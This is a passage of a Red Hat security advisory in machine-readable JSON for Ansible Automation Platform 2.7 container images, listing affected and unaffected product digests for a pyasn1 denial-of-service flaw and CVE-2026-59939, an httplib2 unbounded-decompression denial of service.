"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values"
},
{
"cve": "CVE-2026-59939",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-07-08T20:02:11.756520+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2498212"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in httplib2, a Python HTTP client library. This vulnerability allows a malicious or compromised HTTP server to send a small compressed data payload that, when decompressed by httplib2, expands to an extremely large size in memory. This unbounded decompression can lead to a Denial of Service (DoS) by causing the client application to run out of memory and crash.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "httplib2: httplib2: Denial of Service via unbounded decompression of HTTP response bodies",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in `httplib2` allows a remote attacker to trigger a Denial of Service (DoS) in client applications. By sending a specially crafted, compressed HTTP response, a malicious server can cause the client to exhaust its memory due to unbounded decompression, leading to application crashes. This poses a significant risk to Red Hat products that use `httplib2` to process untrusted HTTP content.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
